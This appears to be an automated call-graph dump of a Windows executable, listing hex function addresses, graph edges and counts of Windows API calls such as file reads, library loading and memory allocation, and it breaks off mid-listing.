e777c7 59 API calls 97599->97604 97601 e781a7 59 API calls 97601->97604 97603 eb048e 97603->97571 97604->97590 97604->97591 97604->97593 97604->97594 97604->97598 97604->97599 97604->97601 97604->97605 97606 eb0e00 97604->97606 97608 e7a6ba 97604->97608 97609 e7b5da 97604->97609 97854 e7ca20 341 API calls 2 library calls 97604->97854 97855 e7ba60 60 API calls Mailbox 97604->97855 97605->97571 97858 eda0b5 89 API calls 4 library calls 97606->97858 97857 eda0b5 89 API calls 4 library calls 97608->97857 97859 eda0b5 89 API calls 4 library calls 97609->97859 97611 edd305 97610->97611 97612 edd310 97610->97612 97891 e79c9c 59 API calls 97611->97891 97615 e777c7 59 API calls 97612->97615 97655 edd3ea Mailbox 97612->97655 97614 e90ff6 Mailbox 59 API calls 97616 edd433 97614->97616 97617 edd334 97615->97617 97618 edd43f 97616->97618 97948 e75906 60 API calls Mailbox 97616->97948 97619 e777c7 59 API calls 97617->97619 97860 e79997 97618->97860 97622 edd33d 97619->97622 97624 e79997 84 API calls 97622->97624 97626 edd349 97624->97626 97892 e746f9 97626->97892 97629 edd49e 97634 edd4c9 97629->97634 97635 edd500 97629->97635 97630 edd46a GetLastError 97632 edd483 97630->97632 97631 edd35e 97633 e77c8e 59 API calls 97631->97633 97653 edd3f3 Mailbox 97632->97653 97949 e75a1a CloseHandle 97632->97949 97636 edd391 97633->97636 97637 e90ff6 Mailbox 59 API calls 97634->97637 97638 e90ff6 Mailbox 59 API calls 97635->97638 97639 edd3e3 97636->97639 97943 ed3e73 97636->97943 97641 edd4ce 97637->97641 97643 edd505 97638->97643 97947 e79c9c 59 API calls 97639->97947 97646 edd4df 97641->97646 97649 e777c7 59 API calls 97641->97649 97647 e777c7 59 API calls 97643->97647 97643->97653 97950 edf835 59 API calls 2 library calls 97646->97950 97647->97653 97648 edd3a5 97650 e77f41 59 API calls 97648->97650 97649->97646 97652 edd3b2 97650->97652 97946 ed3c66 63 API calls Mailbox 97652->97946 97653->97580 97655->97614 97655->97653 97656 edd3bb Mailbox 97656->97639 97658 e79997 84 API calls 97657->97658 97659 ee4787 97658->97659 98035 e763a0 97659->98035 97661 ee4797 97662 ee47bc 97661->97662 97663 e7a000 341 API calls 97661->97663 97665 ee47c0 97662->97665 98060 e79bf8 97662->98060 97663->97662 97665->97580 97667 e79bf8 59 API calls 97666->97667 97668 e8213b 97667->97668 97670 e90ff6 Mailbox 59 API calls 97668->97670 97672 eb69af 97668->97672 97671 e82154 97670->97671 97674 e82164 97671->97674 98102 e75906 60 API calls Mailbox 97671->98102 97673 e82189 97672->97673 98106 edf7df 59 API calls 97672->98106 97683 e82196 97673->97683 98107 e79c9c 59 API calls 97673->98107 97676 e79997 84 API calls 97674->97676 97677 e82172 97676->97677 97679 e75956 67 API calls 97677->97679 97681 e82181 97679->97681 97680 eb69f7 97682 eb69ff 97680->97682 97680->97683 97681->97672 97681->97673 98105 e75a1a CloseHandle 97681->98105 98108 e79c9c 59 API calls 97682->98108 97684 e75e3f 2 API calls 97683->97684 97687 e8219d 97684->97687 97688 eb6a11 97687->97688 97689 e821b7 97687->97689 97690 e90ff6 Mailbox 59 API calls 97688->97690 97691 e777c7 59 API calls 97689->97691 97692 eb6a17 97690->97692 97693 e821bf 97691->97693 97694 eb6a2b 97692->97694 98109 e759b0 ReadFile SetFilePointerEx 97692->98109 98087 e756d2 97693->98087 97700 eb6a2f _memmove 97694->97700 98110 ed794e 59 API calls 2 library calls 97694->98110 97696 e821ce 97696->97700 98103 e79b9c 59 API calls Mailbox 97696->98103 97701 e821e2 Mailbox 97702 e8221c 97701->97702 97703 e75dcf CloseHandle 97701->97703 97702->97580 97704 e82210 97703->97704 97704->97702 98104 e75a1a CloseHandle 97704->98104 98148 eecdf1 97706->98148 97708 eee247 97708->97580 97710 edd305 97709->97710 97711 edd310 97709->97711 98259 e79c9c 59 API calls 97710->98259 97714 e777c7 59 API calls 97711->97714 97754 edd3ea Mailbox 97711->97754 97713 e90ff6 Mailbox 59 API calls 97715 edd433 97713->97715 97716 edd334 97714->97716 97717 edd43f 97715->97717 98262 e75906 60 API calls Mailbox 97715->98262 97718 e777c7 59 API calls 97716->97718 97720 e79997 84 API calls 97717->97720 97721 edd33d 97718->97721 97722 edd457 97720->97722 97723 e79997 84 API calls 97721->97723 97724 e75956 67 API calls 97722->97724 97725 edd349 97723->97725 97726 edd466 97724->97726 97727 e746f9 59 API calls 97725->97727 97728 edd49e 97726->97728 97729 edd46a GetLastError 97726->97729 97730 edd35e 97727->97730 97733 edd4c9 97728->97733 97734 edd500 97728->97734 97731 edd483 97729->97731 97732 e77c8e 59 API calls 97730->97732 97752 edd3f3 Mailbox 97731->97752 98263 e75a1a CloseHandle 97731->98263 97735 edd391 97732->97735 97736 e90ff6 Mailbox 59 API calls 97733->97736 97737 e90ff6 Mailbox 59 API calls 97734->97737 97738 edd3e3 97735->97738 97739 ed3e73 3 API calls 97735->97739 97743 edd4ce 97736->97743 97744 edd505 97737->97744 98261 e79c9c 59 API calls 97738->98261 97742 edd3a1 97739->97742 97742->97738 97746 edd3a5 97742->97746 97747 e777c7 59 API calls 97743->97747 97748 edd4df 97743->97748 97745 e777c7 59 API calls 97744->97745 97744->97752 97745->97752 97749 e77f41 59 API calls 97746->97749 97747->97748 98264 edf835 59 API calls 2 library calls 97748->98264 97751 edd3b2 97749->97751 98260 ed3c66 63 API calls Mailbox 97751->98260 97752->97580 97754->97713 97754->97752 97755 edd3bb Mailbox 97755->97738 97757 e777c7 59 API calls 97756->97757 97758 eec608 97757->97758 97759 e777c7 59 API calls 97758->97759 97760 eec610 97759->97760 97761 e777c7 59 API calls 97760->97761 97762 eec618 97761->97762 97763 e79997 84 API calls 97762->97763 97786 eec626 97763->97786 97764 e77d2c 59 API calls 97764->97786 97765 eec80f 97766 eec83c Mailbox 97765->97766 98273 e79b9c 59 API calls Mailbox 97765->98273 97766->97571 97768 eec7f6 98266 e77e0b 97768->98266 97769 e77a84 59 API calls 97769->97786 97770 eec811 97774 e77e0b 59 API calls 97770->97774 97771 e781a7 59 API calls 97771->97786 97775 eec820 97774->97775 97778 e77c8e 59 API calls 97775->97778 97776 e77faf 59 API calls 97780 eec6bd CharUpperBuffW 97776->97780 97777 e77c8e 59 API calls 97777->97765 97778->97765 97779 e77faf 59 API calls 97781 eec77d CharUpperBuffW 97779->97781 98265 e7859a 68 API calls 97780->98265 97783 e7c707 69 API calls 97781->97783 97783->97786 97784 e79997 84 API calls 97784->97786 97785 e77c8e 59 API calls 97785->97786 97786->97764 97786->97765 97786->97766 97786->97768 97786->97769 97786->97770 97786->97771 97786->97776 97786->97779 97786->97784 97786->97785 97787 e77e0b 59 API calls 97786->97787 97787->97786 97789 ed7bec 97788->97789 97790 e90ff6 Mailbox 59 API calls 97789->97790 97791 ed7bfa 97790->97791 97792 ed7c08 97791->97792 97793 e777c7 59 API calls 97791->97793 97792->97571 97793->97792 97795 eebfab 97794->97795 97796 eebfc5 97794->97796 98279 eda0b5 89 API calls 4 library calls 97795->98279 98280 eea528 59 API calls Mailbox 97796->98280 97799 eebfd0 97800 e7a000 340 API calls 97799->97800 97801 eec031 97800->97801 97802 eec0c3 97801->97802 97805 eec072 97801->97805 97827 eebfbd Mailbox 97801->97827 97803 eec119 97802->97803 97804 eec0c9 97802->97804 97806 e79997 84 API calls 97803->97806 97803->97827 98300 ed7ba4 59 API calls 97804->98300 98281 ed7581 59 API calls Mailbox 97805->98281 97808 eec12b 97806->97808 97811 e77faf 59 API calls 97808->97811 97809 eec0ec 98301 e75ea1 59 API calls Mailbox 97809->98301 97814 eec14f CharUpperBuffW 97811->97814 97813 eec0a2 98282 e7f5c0 97813->98282 97817 eec169 97814->97817 97815 eec0f4 Mailbox 98302 e7fe40 341 API calls 2 library calls 97815->98302 97818 eec1bc 97817->97818 97819 eec170 97817->97819 97821 e79997 84 API calls 97818->97821 98303 ed7581 59 API calls Mailbox 97819->98303 97822 eec1c4 97821->97822 98304 e79fbd 60 API calls 97822->98304 97825 eec19e 97826 e7f5c0 340 API calls 97825->97826 97826->97827 97827->97571 97828 eec1ce 97828->97827 97829 e79997 84 API calls 97828->97829 97830 eec1e9 97829->97830 98305 e75ea1 59 API calls Mailbox 97830->98305 97832 eec1f9 98306 e7fe40 341 API calls 2 library calls 97832->98306 99382 ec6636 97834->99382 97836 ec6702 97836->97571 97837->97559 97838->97559 97839->97580 97840->97574 97841->97562 97842->97577 97843->97571 97844->97571 97845->97571 97846->97580 97847->97550 97848->97569 97849->97569 97850->97569 97851->97556 97852->97541 97853->97556 97854->97604 97855->97604 97856->97603 97857->97605 97858->97609 97859->97605 97861 e799b1 97860->97861 97873 e799ab 97860->97873 97862 eaf9fc __i64tow 97861->97862 97863 e799f9 97861->97863 97865 e799b7 __itow 97861->97865 97869 eaf903 97861->97869 97951 e938d8 83 API calls 3 library calls 97863->97951 97868 e90ff6 Mailbox 59 API calls 97865->97868 97866 eaf97b Mailbox _wcscpy 97952 e938d8 83 API calls 3 library calls 97866->97952 97870 e799d1 97868->97870 97869->97866 97871 e90ff6 Mailbox 59 API calls 97869->97871 97872 e77f41 59 API calls 97870->97872 97870->97873 97875 eaf948 97871->97875 97872->97873 97878 e75956 97873->97878 97874 e90ff6 Mailbox 59 API calls 97876 eaf96e 97874->97876 97875->97874 97876->97866 97877 e77f41 59 API calls 97876->97877 97877->97866 97953 e75dcf 97878->97953 97882 e75981 97883 e759a4 97882->97883 97965 e75770 97882->97965 97883->97629 97883->97630 97885 e75993 97982 e753db SetFilePointerEx SetFilePointerEx 97885->97982 97887 e7599a 97887->97883 97888 eae030 97887->97888 97983 ed3696 SetFilePointerEx SetFilePointerEx WriteFile 97888->97983 97890 eae060 97890->97883 97891->97612 97893 e777c7 59 API calls 97892->97893 97894 e7470f 97893->97894 97895 e777c7 59 API calls 97894->97895 97896 e74717 97895->97896 97897 e777c7 59 API calls 97896->97897 97898 e7471f 97897->97898 97899 e777c7 59 API calls 97898->97899 97900 e74727 97899->97900 97901 ead8fb 97900->97901 97902 e7475b 97900->97902 97903 e781a7 59 API calls 97901->97903 97904 e779ab 59 API calls 97902->97904 97905 ead904 97903->97905 97906 e74769 97904->97906 98025 e77eec 97905->98025 97908 e77e8c 59 API calls 97906->97908 97909 e74773 97908->97909 97910 e7479e 97909->97910 97911 e779ab 59 API calls 97909->97911 97912 e747de 97910->97912 97914 e747bd 97910->97914 97925 ead924 97910->97925 97915 e74794 97911->97915 98009 e779ab 97912->98009 98022 e77b52 97914->98022 97918 e77e8c 59 API calls 97915->97918 97916 e747ef 97920 e74801 97916->97920 97923 e781a7 59 API calls 97916->97923 97917 ead9f4 97921 e77d2c 59 API calls 97917->97921 97918->97910 97924 e74811 97920->97924 97926 e781a7 59 API calls 97920->97926 97932 ead9b1 97921->97932 97923->97920 97928 e74818 97924->97928 97930 e781a7 59 API calls 97924->97930 97925->97917 97927 ead9dd 97925->97927 97940 ead95b 97925->97940 97926->97924 97927->97917 97934 ead9c8 97927->97934 97931 e781a7 59 API calls 97928->97931 97939 e7481f Mailbox 97928->97939 97929 e779ab 59 API calls 97929->97912 97930->97928 97931->97939 97932->97912 97933 e77b52 59 API calls 97932->97933 98029 e77a84 59 API calls 2 library calls 97932->98029 97933->97932 97936 e77d2c 59 API calls 97934->97936 97935 ead9b9 97937 e77d2c 59 API calls 97935->97937 97936->97932 97937->97932 97939->97631 97940->97935 97941 ead9a4 97940->97941 97942 e77d2c 59 API calls 97941->97942 97942->97932 98031 ed4696 GetFileAttributesW 97943->98031 97946->97656 97947->97655 97948->97618 97949->97653 97950->97653 97951->97865 97952->97862 97954 e75962 97953->97954 97955 e75de8 97953->97955 97957 e75df9 97954->97957 97955->97954 97956 e75ded CloseHandle 97955->97956 97956->97954 97958 e75e12 CreateFileW 97957->97958 97959 eae181 97957->97959 97960 e75e34 97958->97960 97959->97960 97961 eae187 CreateFileW 97959->97961 97960->97882 97961->97960 97962 eae1ad 97961->97962 97984 e75c4e 97962->97984 97966 eadfce 97965->97966 97967 e7578b 97965->97967 97977 e7581a 97966->97977 98003 e75e3f 97966->98003 97968 e75c4e 2 API calls 97967->97968 97967->97977 97969 e757ad 97968->97969 97994 e7538e 97969->97994 97973 e757c4 97974 e90ff6 Mailbox 59 API calls 97973->97974 97975 e757cf 97974->97975 97976 e7538e 59 API calls 97975->97976 97978 e757da 97976->97978 97977->97885 97997 e75d20 97978->97997 97981 e75c4e 2 API calls 97981->97977 97982->97887 97983->97890 97991 e75c68 97984->97991 97985 e75cef SetFilePointerEx 97992 e75dae SetFilePointerEx 97985->97992 97988 eae151 97993 e75dae SetFilePointerEx 97988->97993 97989 e75cc3 97989->97960 97990 eae16b 97991->97985 97991->97988 97991->97989 97992->97989 97993->97990 97995 e90ff6 Mailbox 59 API calls 97994->97995 97996 e753a0 97995->97996 97996->97966 97996->97973 97998 e75d93 97997->97998 97999 e75d2e 97997->97999 98008 e75dae SetFilePointerEx 97998->98008 98000 e75807 97999->98000 98002 e75d66 ReadFile 97999->98002 98000->97981 98002->97999 98002->98000 98004 e75c4e 2 API calls 98003->98004 98005 e75e60 98004->98005 98006 e75c4e 2 API calls 98005->98006 98007 e75e74 98006->98007 98007->97977 98008->97999 98010 e77a17 98009->98010 98011 e779ba 98009->98011 98012 e77e8c 59 API calls 98010->98012 98011->98010 98013 e779c5 98011->98013 98014 e779e8 _memmove 98012->98014 98015 e779e0 98013->98015 98016 eaef32 98013->98016 98014->97916 98030 e78087 59 API calls Mailbox 98015->98030 98018 e78189 59 API calls 98016->98018 98019 eaef3c 98018->98019 98020 e90ff6 Mailbox 59 API calls 98019->98020 98021 eaef5c 98020->98021 98023 e77faf 59 API calls 98022->98023 98024 e747c7 98023->98024 98024->97912 98024->97929 98026 e77f06 98025->98026 98028 e77ef9 98025->98028 98027 e90ff6 Mailbox 59 API calls 98026->98027 98027->98028 98028->97910 98029->97932 98030->98014 98032 ed3e7a 98031->98032 98033 ed46b1 FindFirstFileW 98031->98033 98032->97639 98032->97648 98033->98032 98034 ed46c6 FindClose 98033->98034 98034->98032 98036 e77b76 59 API calls 98035->98036 98037 e763c5 98036->98037 98038 e765ca 98037->98038 98043 e7766f 59 API calls 98037->98043 98044 eae41f 98037->98044 98046 e768f9 _memmove 98037->98046 98050 e77eec 59 API calls 98037->98050 98053 eae3bb 98037->98053 98057 e77faf 59 API calls 98037->98057 98073 e760cc 60 API calls 98037->98073 98074 e75ea1 59 API calls Mailbox 98037->98074 98083 e75fd2 60 API calls 98037->98083 98084 e77a84 59 API calls 2 library calls 98037->98084 98075 e7766f 98038->98075 98040 e765e4 Mailbox 98040->97661 98043->98037 98085 ecfdba 91 API calls 4 library calls 98044->98085 98086 ecfdba 91 API calls 4 library calls 98046->98086 98049 eae42d 98051 e7766f 59 API calls 98049->98051 98050->98037 98052 eae443 98051->98052 98052->98040 98054 e78189 59 API calls 98053->98054 98055 eae3c6 98054->98055 98059 e90ff6 Mailbox 59 API calls 98055->98059 98058 e7659b CharUpperBuffW 98057->98058 98058->98037 98059->98046 98061 eafbff 98060->98061 98062 e79c08 98060->98062 98063 e77d2c 59 API calls 98061->98063 98066 eafc10 98061->98066 98065 e90ff6 Mailbox 59 API calls 98062->98065 98063->98066 98064 e77eec 59 API calls 98067 eafc1a 98064->98067 98068 e79c1b 98065->98068 98066->98064 98070 e79c34 98067->98070 98071 e777c7 59 API calls 98067->98071 98068->98067 98069 e79c26 98068->98069 98069->98070 98072 e77f41 59 API calls 98069->98072 98070->97665 98071->98070 98072->98070 98073->98037 98074->98037 98076 e7770f 98075->98076 98080 e77682 _memmove 98075->98080 98078 e90ff6 Mailbox 59 API calls 98076->98078 98077 e90ff6 Mailbox 59 API calls 98079 e77689 98077->98079 98078->98080 98081 e90ff6 Mailbox 59 API calls 98079->98081 98082 e776b2 98079->98082 98080->98077 98081->98082 98082->98040 98083->98037 98084->98037 98085->98049 98086->98040 98088 e75702 98087->98088 98089 e756dd 98087->98089 98090 e77eec 59 API calls 98088->98090 98089->98088 98093 e756ec 98089->98093 98094 ed349a 98090->98094 98091 ed34c9 98091->97696 98113 e75c18 98093->98113 98094->98091 98111 ed3436 ReadFile SetFilePointerEx 98094->98111 98112 e77a84 59 API calls 2 library calls 98094->98112 98101 ed35d8 Mailbox 98101->97696 98102->97674 98103->97701 98104->97702 98105->97672 98106->97672 98107->97680 98108->97687 98109->97694 98110->97700 98111->98094 98112->98094 98114 e90ff6 Mailbox 59 API calls 98113->98114 98115 e75c2b 98114->98115 98116 e90ff6 Mailbox 59 API calls 98115->98116 98117 e75c37 98116->98117 98118 e75632 98117->98118 98125 e75a2f 98118->98125 98120 e75674 98120->98101 98124 e7793a 61 API calls Mailbox 98120->98124 98121 e75d20 2 API calls 98122 e75643 98121->98122 98122->98120 98122->98121 98132 e75bda 98122->98132 98124->98101 98126 e75a40 98125->98126 98127 eae065 98125->98127 98126->98122 98141 ec6443 59 API calls Mailbox 98127->98141 98129 eae06f 98130 e90ff6 Mailbox 59 API calls 98129->98130 98131 eae07b 98130->98131 98133 e75bee 98132->98133 98134 eae117 98132->98134 98142 e75b19 98133->98142 98147 ec6443 59 API calls Mailbox 98134->98147 98137 e75bfa 98137->98122 98138 eae122 98139 e90ff6 Mailbox 59 API calls 98138->98139 98140 eae137 _memmove 98139->98140 98141->98129 98143 e75b31 98142->98143 98146 e75b2a _memmove 98142->98146 98144 eae0a7 98143->98144 98145 e90ff6 Mailbox 59 API calls 98143->98145 98145->98146 98146->98137 98147->98138 98149 e79997 84 API calls 98148->98149 98150 eece2e 98149->98150 98174 eece75 Mailbox 98150->98174 98186 eedab9 98150->98186 98152 eed0cd 98153 eed242 98152->98153 98157 eed0db 98152->98157 98236 eedbdc 92 API calls Mailbox 98153->98236 98156 eed251 98156->98157 98158 eed25d 98156->98158 98199 eecc82 98157->98199 98158->98174 98159 e79997 84 API calls 98177 eecec6 Mailbox 98159->98177 98164 eed114 98214 e90e48 98164->98214 98167 eed12e 98220 eda0b5 89 API calls 4 library calls 98167->98220 98168 eed147 98221 e7942e 98168->98221 98171 eed139 GetCurrentProcess TerminateProcess 98171->98168 98174->97708 98177->98152 98177->98159 98177->98174 98218 edf835 59 API calls 2 library calls 98177->98218 98219 eed2f3 61 API calls 2 library calls 98177->98219 98178 eed2b8 98178->98174 98180 eed2cc FreeLibrary 98178->98180 98179 eed17f 98233 eed95d 107 API calls _free 98179->98233 98180->98174 98185 eed190 98185->98178 98234 e78ea0 59 API calls Mailbox 98185->98234 98235 e79e9c 60 API calls Mailbox 98185->98235 98237 eed95d 107 API calls _free 98185->98237 98187 e77faf 59 API calls 98186->98187 98188 eedad4 CharLowerBuffW 98187->98188 98238 ecf658 98188->98238 98192 e777c7 59 API calls 98193 eedb0d 98192->98193 98194 e779ab 59 API calls 98193->98194 98195 eedb24 98194->98195 98196 e77e8c 59 API calls 98195->98196 98197 eedb30 Mailbox 98196->98197 98198 eedb6c Mailbox 98197->98198 98245 eed2f3 61 API calls 2 library calls 98197->98245 98198->98177 98200 eecc9d 98199->98200 98204 eeccf2 98199->98204 98201 e90ff6 Mailbox 59 API calls 98200->98201 98203 eeccbf 98201->98203 98202 e90ff6 Mailbox 59 API calls 98202->98203 98203->98202 98203->98204 98205 eedd64 98204->98205 98206 eedf8d Mailbox 98205->98206 98213 eedd87 _strcat _wcscpy __NMSG_WRITE 98205->98213 98206->98164 98207 e79d46 59 API calls 98207->98213 98208 e79c9c 59 API calls 98208->98213 98209 e79cf8 59 API calls 98209->98213 98210 e79997 84 API calls 98210->98213 98211 e9594c 58 API calls __crtLCMapStringA_stat 98211->98213 98213->98206 98213->98207 98213->98208 98213->98209 98213->98210 98213->98211 98248 ed5b29 61 API calls 2 library calls 98213->98248 98215 e90e5d 98214->98215 98216 e90ef5 VirtualAlloc 98215->98216 98217 e90ec3 98215->98217 98216->98217 98217->98167 98217->98168 98218->98177 98219->98177 98220->98171 98222 e79436 98221->98222 98223 e90ff6 Mailbox 59 API calls 98222->98223 98224 e79444 98223->98224 98226 e79450 98224->98226 98249 e7935c 59 API calls Mailbox 98224->98249 98227 e791b0 98226->98227 98250 e792c0 98227->98250 98229 e791bf 98230 e90ff6 Mailbox 59 API calls 98229->98230 98231 e7925b 98229->98231 98230->98231 98231->98185 98232 e78ea0 59 API calls Mailbox 98231->98232 98232->98179 98233->98185 98234->98185 98235->98185 98236->98156 98237->98185 98239 ecf683 __NMSG_WRITE 98238->98239 98240 ecf6c2 98239->98240 98241 ecf769 98239->98241 98242 ecf6b8 98239->98242 98240->98192 98240->98197 98241->98240 98247 e77a24 61 API calls 98241->98247 98242->98240 98246 e77a24 61 API calls 98242->98246 98245->98198 98246->98242 98247->98241 98248->98213 98249->98226 98251 e792c9 Mailbox 98250->98251 98252 eaf5c8 98251->98252 98257 e792d3 98251->98257 98253 e90ff6 Mailbox 59 API calls 98252->98253 98255 eaf5d4 98253->98255 98254 e792da 98254->98229 98257->98254 98258 e79df0 59 API calls Mailbox 98257->98258 98258->98257 98259->97711 98260->97755 98261->97754 98262->97717 98263->97752 98264->97752 98265->97786 98267 e77e1f 98266->98267 98268 eaf173 98266->98268 98274 e77db0 98267->98274 98269 e78189 59 API calls 98268->98269 98272 eaf17e __NMSG_WRITE _memmove 98269->98272 98271 e77e2a 98271->97777 98273->97766 98275 e77dbf __NMSG_WRITE 98274->98275 98276 e77dd0 _memmove 98275->98276 98277 e78189 59 API calls 98275->98277 98276->98271 98278 eaf130 _memmove 98277->98278 98279->97827 98280->97799 98281->97813 98283 e7f7b0 98282->98283 98284 e7f61a 98282->98284 98287 e77f41 59 API calls 98283->98287 98285 e7f626 98284->98285 98286 eb4848 98284->98286 98307 e7f3f0 98285->98307 98288 eebf80 341 API calls 98286->98288 98290 e7f6ec Mailbox 98287->98290 98293 eb4856 98288->98293 98299 ed3e73 3 API calls 98290->98299 98322 eee24b 98290->98322 98325 edcde5 98290->98325 98291 e7f65d 98291->98290 98292 e7f790 98291->98292 98291->98293 98292->97827 98293->98292 98406 eda0b5 89 API calls 4 library calls 98293->98406 98296 e7f743 98296->98292 98405 e79df0 59 API calls Mailbox 98296->98405 98299->98296 98300->97809 98301->97815 98302->97827 98303->97825 98304->97828 98305->97832 98306->97827 98308 e7f59a 98307->98308 98310 e7f41c 98307->98310 98408 eda0b5 89 API calls 4 library calls 98308->98408 98310->98308 98319 e7f459 _memmove 98310->98319 98311 e7f533 98312 e7f543 98311->98312 98407 eea5ee 85 API calls Mailbox 98311->98407 98312->98291 98314 e90ff6 59 API calls Mailbox 98314->98319 98315 eb4823 98410 e7f803 341 API calls 98315->98410 98317 e7a000 341 API calls 98317->98319 98318 eb47d3 98318->98291 98319->98311 98319->98314 98319->98315 98319->98317 98319->98318 98320 eb47d5 98319->98320 98409 eda0b5 89 API calls 4 library calls 98320->98409 98323 eecdf1 130 API calls 98322->98323 98324 eee25b 98323->98324 98324->98296 98326 e777c7 59 API calls 98325->98326 98327 edce1a 98326->98327 98328 e777c7 59 API calls 98327->98328 98329 edce23 98328->98329 98330 edce37 98329->98330 98544 e79c9c 59 API calls 98329->98544 98332 e79997 84 API calls 98330->98332 98333 edce54 98332->98333 98334 edcf85 Mailbox 98333->98334 98335 edcf55 98333->98335 98336 edce76 98333->98336 98334->98296 98411 e74f3d 98335->98411 98337 e79997 84 API calls 98336->98337 98339 edce82 98337->98339 98341 e781a7 59 API calls 98339->98341 98344 edce8e 98341->98344 98342 edcf81 98342->98334 98343 e777c7 59 API calls 98342->98343 98346 edcfb6 98343->98346 98349 edced4 98344->98349 98350 edcea2 98344->98350 98345 e74f3d 136 API calls 98345->98342 98347 e777c7 59 API calls 98346->98347 98348 edcfbf 98347->98348 98352 e777c7 59 API calls 98348->98352 98351 e79997 84 API calls 98349->98351 98353 e781a7 59 API calls 98350->98353 98354 edcee1 98351->98354 98355 edcfc8 98352->98355 98356 edceb2 98353->98356 98357 e781a7 59 API calls 98354->98357 98358 e777c7 59 API calls 98355->98358 98359 e77e0b 59 API calls 98356->98359 98360 edceed 98357->98360 98361 edcfd1 98358->98361 98362 edcebc 98359->98362 98545 ed4cd3 GetFileAttributesW 98360->98545 98364 e79997 84 API calls 98361->98364 98365 e79997 84 API calls 98362->98365 98368 edcfde 98364->98368 98366 edcec8 98365->98366 98369 e77c8e 59 API calls 98366->98369 98367 edcef6 98370 edcf09 98367->98370 98373 e77b52 59 API calls 98367->98373 98371 e746f9 59 API calls 98368->98371 98369->98349 98372 e79997 84 API calls 98370->98372 98379 edcf0f 98370->98379 98374 edcff9 98371->98374 98375 edcf36 98372->98375 98373->98370 98376 e77b52 59 API calls 98374->98376 98546 ed3a2b 75 API calls Mailbox 98375->98546 98378 edd008 98376->98378 98380 edd03c 98378->98380 98381 e77b52 59 API calls 98378->98381 98379->98334 98382 e781a7 59 API calls 98380->98382 98383 edd019 98381->98383 98384 edd04a 98382->98384 98383->98380 98386 e77d2c 59 API calls 98383->98386 98385 e77c8e 59 API calls 98384->98385 98387 edd058 98385->98387 98388 edd02e 98386->98388 98389 e77c8e 59 API calls 98387->98389 98390 e77d2c 59 API calls 98388->98390 98391 edd066 98389->98391 98390->98380 98392 e77c8e 59 API calls 98391->98392 98393 edd074 98392->98393 98394 e79997 84 API calls 98393->98394 98395 edd080 98394->98395 98435 ed42ad 98395->98435 98397 edd091 98398 ed3e73 3 API calls 98397->98398 98399 edd09b 98398->98399 98400 e79997 84 API calls 98399->98400 98404 edd0cc 98399->98404 98401 edd0b9 98400->98401 98489 ed93df 98401->98489 98547 e74faa 98404->98547 98405->98296 98406->98292 98407->98312 98408->98318 98409->98318 98410->98318 98553 e74d13 98411->98553 98416 eadd0f 98419 e74faa 84 API calls 98416->98419 98417 e74f68 LoadLibraryExW 98563 e74cc8 98417->98563 98421 eadd16 98419->98421 98423 e74cc8 3 API calls 98421->98423 98425 eadd1e 98423->98425 98424 e74f8f 98424->98425 98426 e74f9b 98424->98426 98589 e7506b 98425->98589 98428 e74faa 84 API calls 98426->98428 98430 e74fa0 98428->98430 98430->98342 98430->98345 98432 eadd45 98597 e75027 98432->98597 98436 ed42c9 98435->98436 98437 ed42dc 98436->98437 98438 ed42ce 98436->98438 98440 e777c7 59 API calls 98437->98440 98439 e781a7 59 API calls 98438->98439 98488 ed42d7 Mailbox 98439->98488 98441 ed42e4 98440->98441 98442 e777c7 59 API calls 98441->98442 98443 ed42ec 98442->98443 98444 e777c7 59 API calls 98443->98444 98445 ed42f7 98444->98445 98446 e777c7 59 API calls 98445->98446 98447 ed42ff 98446->98447 98448 e777c7 59 API calls 98447->98448 98449 ed4307 98448->98449 98450 e777c7 59 API calls 98449->98450 98451 ed430f 98450->98451 98452 e777c7 59 API calls 98451->98452 98453 ed4317 98452->98453 98454 e777c7 59 API calls 98453->98454 98455 ed431f 98454->98455 98456 e746f9 59 API calls 98455->98456 98457 ed4336 98456->98457 98458 e746f9 59 API calls 98457->98458 98459 ed434f 98458->98459 98460 e77b52 59 API calls 98459->98460 98461 ed435b 98460->98461 98462 ed436e 98461->98462 98463 e77e8c 59 API calls 98461->98463 98464 e77b52 59 API calls 98462->98464 98463->98462 98465 ed4377 98464->98465 98466 ed4387 98465->98466 98467 e77e8c 59 API calls 98465->98467 98468 e781a7 59 API calls 98466->98468 98467->98466 98469 ed4393 98468->98469 98470 e77c8e 59 API calls 98469->98470 98471 ed439f 98470->98471 99024 ed445f 59 API calls 98471->99024 98473 ed43ae 99025 ed445f 59 API calls 98473->99025 98475 ed43c1 98476 e77b52 59 API calls 98475->98476 98477 ed43cb 98476->98477 98478 ed43d0 98477->98478 98479 ed43e2 98477->98479 98480 e77e0b 59 API calls 98478->98480 98481 e77b52 59 API calls 98479->98481 98488->98397 98490 ed93ec __ftell_nolock 98489->98490 98491 e90ff6 Mailbox 59 API calls 98490->98491 98492 ed9449 98491->98492 98493 e7538e 59 API calls 98492->98493 98494 ed9453 98493->98494 98495 ed91e9 GetSystemTimeAsFileTime 98494->98495 98496 ed945e 98495->98496 98497 e75045 85 API calls 98496->98497 98498 ed9471 _wcscmp 98497->98498 98499 ed9495 98498->98499 98500 ed9542 98498->98500 99056 ed99be 98499->99056 98502 ed99be 96 API calls 98500->98502 98517 ed950e _wcscat 98502->98517 98505 e7506b 74 API calls 98506 ed9567 98505->98506 98508 e7506b 74 API calls 98506->98508 98507 ed954b 98507->98404 98510 ed9577 98508->98510 98509 ed94c3 _wcscat _wcscpy 99063 e9432e 58 API calls __wsplitpath_helper 98509->99063 98511 e7506b 74 API calls 98510->98511 98513 ed9592 98511->98513 98514 e7506b 74 API calls 98513->98514 98515 ed95a2 98514->98515 98516 e7506b 74 API calls 98515->98516 98518 ed95bd 98516->98518 98517->98505 98517->98507 98519 e7506b 74 API calls 98518->98519 98520 ed95cd 98519->98520 98521 e7506b 74 API calls 98520->98521 98522 ed95dd 98521->98522 98523 e7506b 74 API calls 98522->98523 98524 ed95ed 98523->98524 99026 ed9b6d GetTempPathW GetTempFileNameW 98524->99026 98526 ed95f9 98544->98330 98545->98367 98546->98379 98548 e74fb4 98547->98548 98549 e74fbb 98547->98549 98550 e955d6 __fcloseall 83 API calls 98548->98550 98551 e74fdb FreeLibrary 98549->98551 98552 e74fca 98549->98552 98550->98549 98551->98552 98552->98334 98602 e74d61 98553->98602 98556 e74d3a 98558 e74d53 98556->98558 98559 e74d4a FreeLibrary 98556->98559 98557 e74d61 2 API calls 98557->98556 98560 e9548b 98558->98560 98559->98558 98606 e954a0 98560->98606 98562 e74f5c 98562->98416 98562->98417 98764 e74d94 98563->98764 98566 e74d94 2 API calls 98569 e74ced 98566->98569 98567 e74cff FreeLibrary 98568 e74d08 98567->98568 98570 